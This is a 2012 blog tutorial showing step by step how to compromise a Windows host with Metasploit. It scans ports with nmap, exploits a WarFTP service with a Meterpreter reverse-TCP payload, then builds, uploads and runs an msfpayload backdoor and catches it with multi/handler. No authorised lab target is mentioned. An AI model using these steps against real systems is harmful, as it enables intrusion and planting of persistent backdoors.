Senin, 27 Februari 2012

exploitation using msfconsole "metasploit"

here I will do the exploitation of windows by using msfconsole.

The first thing we do is see what ports are open using nmap.
 can be seen in the picture. an open port that is 21'ftp', 135 'msrpc', 139 'netbios-ssn', 445'microsoft-ds.
on this occasion I will try to use port warftp

then we get into msfconsole, we find out about the war ftp. by writing the command search warftp. I use exploit/windows/ftp/warftpd_165_user.
Next we do the setting lhost, rhost, port.
I used the payload on windows/meterpreter/reverse_tcp.

then do a search target. target by using the show target command. I try to target 3.
Now do set targets and make exploitation.

 then open a new console. We will send backdor.
write msfpayload -l

insert the command  msfpayload windows/meterpreter/blind_tcp rport ="port_victim" rhost ="ip_addres_victim" > "name_payload.exe"

The next phase of return to our first console did upload payload we have made.
upload successfully ..

then open a new msfconsole. we will get into multi / handler.
type the following command: use exploit/multi/handler. and set payload.

 back to meterpreter., perform execution payload we have sent

at the final stage of exploitation done on the multi / handler

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